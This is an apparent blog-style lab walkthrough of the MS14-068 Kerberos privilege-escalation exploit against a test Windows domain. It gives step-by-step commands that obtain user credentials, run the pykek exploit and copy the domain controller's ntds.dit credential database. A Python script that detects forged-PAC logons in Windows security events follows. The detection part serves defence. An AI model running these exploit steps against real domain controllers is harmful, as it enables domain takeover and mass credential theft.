Microsoft hotfix / bulletin: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx

Step 1 - Determine the DC location and DNS server

    nmap -p53,88 10.2.1.100-101 -sT -sU

Step 2 - Install Kerberos tools

    apt-get install krb5-user cifs-utils git

* This will prompt for realm setup; for this example simply OK the GUI with blanks.

Step 3 - Determine the time on the DC, for ticket sync

    net time -S 10.2.1.100 -U ""

* Gotta be within 5 minutes as per the RFC, yet +/-30 minute skews may still work.

Step 4 - Edit /etc/krb5.conf

In this example's case (default_realm is the realm name, not the DC hostname):

    [libdefaults]
        default_realm = BOOBOOWARE.LOCAL
        dns_lookup_realm = true
        dns_lookup_kdc = true

    [realms]
        BOOBOOWARE.LOCAL = {
            kdc = Win2k3.boobooware.local:88
            kdc = Win2k8.boobooware.local:88
            admin_server = Win2k3.boobooware.local
            default_domain = boobooware.local
        }

    [domain_realm]
        .boobooware.local = BOOBOOWARE.LOCAL
        boobooware.local = BOOBOOWARE.LOCAL

Step 5 - Edit /etc/hosts and /etc/resolv.conf

/etc/hosts - add anywhere:

    10.2.1.100 win2k3.boobooware.local win2k3
    10.2.1.101 win2k8.boobooware.local win2k8

/etc/resolv.conf - add to the top:

    nameserver 10.2.1.100

Step 6 - Get user creds... (kinda important)

Social engineer, brute force, passive collect... In my case, I have an account called user1.

Step 7 - Test Kerberos authentication

    kinit USER1@BOOBOOWARE.LOCAL

* No errors means it works. The realm must be ALL UPPERCASE.

Step 8 - Get the MS14-068 exploit from bidord aka Sylvain Monné (Thanks!!!)

    git clone https://github.com/bidord/pykek.git

Step 9 - Get the SID for the user; the exploit needs it

    rpcclient -U "" 10.2.1.100
    lookupnames user1

* If null sessions aren't allowed, just use the creds. Copy the SID.

Step 10 - Run the exploit (Told ya 10 steps!)

    cd pykek
    python ms14-068.py -u user1@boobooware.local -s S-1-5-21-2505418965-2701690409-4286734078-1115 -d win2k3.boobooware.local

* Boom!

Step 11 - Move the modified cached creds into the Kerberos credential cache; look for TGT*.ccache

    mv TGT_user1@boobooware.local.ccache /tmp/krb5cc_0

Step 12 - Connect to a known share on the victim DC

    smbclient -W BOOBOOWARE.LOCAL //win2k3/c$ -k
    get WINDOWS\SYSTEM32\ntds.dit ntds.dit
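From the DC side, the walkthrough above leaves a trace: the ticket built in Steps 10-12 was never issued by the KDC, and the published indicator for MS14-068 forged-PAC logons is a Kerberos logon (Security event 4624) whose "Account Domain" under "New Logon" is blank or the domain FQDN (boobooware.local) instead of the NetBIOS name (BOOBOOWARE) that a genuine ticket produces. The script below is an added example, not code from the post or from pykek; it runs that heuristic over constructed 4624 event text for the lab domain used here. The event bodies, the SID and the expected NetBIOS name BOOBOOWARE are all assumptions for this lab.

```python
import re

# Short (NetBIOS) domain name that a ticket issued by the real KDC produces in the
# "Account Domain" field of event 4624. Assumed for the lab domain used in the post.
EXPECTED_NETBIOS_DOMAIN = "BOOBOOWARE"

# Fields we care about inside the "New Logon:" and "Detailed Authentication
# Information:" sections of a 4624 event body (text as exported from the Security log).
FIELD_RE = re.compile(
    r"^\s*(Security ID|Account Name|Account Domain|Authentication Package):\s*(.*?)\s*$",
    re.MULTILINE,
)

# Constructed 4624 event bodies for the lab domain, not real log data.
SAMPLE_EVENTS = [
    # 1. Genuine Kerberos network logon: the domain is logged as the NetBIOS name.
    "An account was successfully logged on.\n"
    "Subject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n"
    "Logon Type:\t\t\t3\n"
    "New Logon:\n"
    "\tSecurity ID:\t\tS-1-5-21-2505418965-2701690409-4286734078-1115\n"
    "\tAccount Name:\t\tuser1\n"
    "\tAccount Domain:\t\tBOOBOOWARE\n"
    "Detailed Authentication Information:\n"
    "\tLogon Process:\t\tKerberos\n"
    "\tAuthentication Package:\tKerberos\n",
    # 2. Forged-PAC pattern (MS14-068): same user, but the domain arrives as the
    #    lowercase FQDN because the attacker-built ticket carried it that way.
    "An account was successfully logged on.\n"
    "Subject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n"
    "Logon Type:\t\t\t3\n"
    "New Logon:\n"
    "\tSecurity ID:\t\tS-1-5-21-2505418965-2701690409-4286734078-1115\n"
    "\tAccount Name:\t\tuser1\n"
    "\tAccount Domain:\t\tboobooware.local\n"
    "Detailed Authentication Information:\n"
    "\tLogon Process:\t\tKerberos\n"
    "\tAuthentication Package:\tKerberos\n",
    # 3. NTLM logon to a local machine account: not Kerberos, so out of scope here.
    "An account was successfully logged on.\n"
    "Logon Type:\t\t\t3\n"
    "New Logon:\n"
    "\tSecurity ID:\t\tS-1-5-21-1111111111-2222222222-3333333333-500\n"
    "\tAccount Name:\t\tAdministrator\n"
    "\tAccount Domain:\t\tWIN2K3\n"
    "Detailed Authentication Information:\n"
    "\tLogon Process:\t\tNtLmSsp\n"
    "\tAuthentication Package:\tNTLM\n",
]


def parse_4624(event_text):
    """Return the New Logon / auth fields of a 4624 body as a dict, or None if not a 4624.

    Only the text after "New Logon:" is parsed so that the Subject section's
    placeholder "Account Name"/"Account Domain" values do not shadow the real ones.
    """
    if "An account was successfully logged on." not in event_text:
        return None
    _head, sep, tail = event_text.partition("New Logon:")
    if not sep:
        return None
    return {name: value for name, value in FIELD_RE.findall(tail)}


def is_forged_pac_indicator(fields, expected_netbios=EXPECTED_NETBIOS_DOMAIN):
    """True when a Kerberos logon reports a blank or FQDN-style Account Domain."""
    if fields.get("Authentication Package", "").lower() != "kerberos":
        return False
    domain = fields.get("Account Domain", "")
    if domain.upper() == expected_netbios.upper():
        return False  # the form a KDC-issued ticket produces
    return domain in ("", "-") or "." in domain


def scan_events(events, expected_netbios=EXPECTED_NETBIOS_DOMAIN):
    """Run the heuristic over a list of event bodies; return one finding per hit."""
    findings = []
    for event_text in events:
        fields = parse_4624(event_text)
        if fields and is_forged_pac_indicator(fields, expected_netbios):
            findings.append({
                "account": fields.get("Account Name"),
                "sid": fields.get("Security ID"),
                "domain": fields.get("Account Domain"),
            })
    return findings


if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print("possible forged PAC logon:", hit)
```

Tuning note: the check is deliberately narrow (Kerberos package plus a blank or dotted domain). In a forest with trusts, confirm what your DCs log for cross-realm principals before alerting on every dotted domain, and pair a hit with event 4672 (special privileges assigned) for a user who is not normally an administrator, since the forged PAC is what grants those groups.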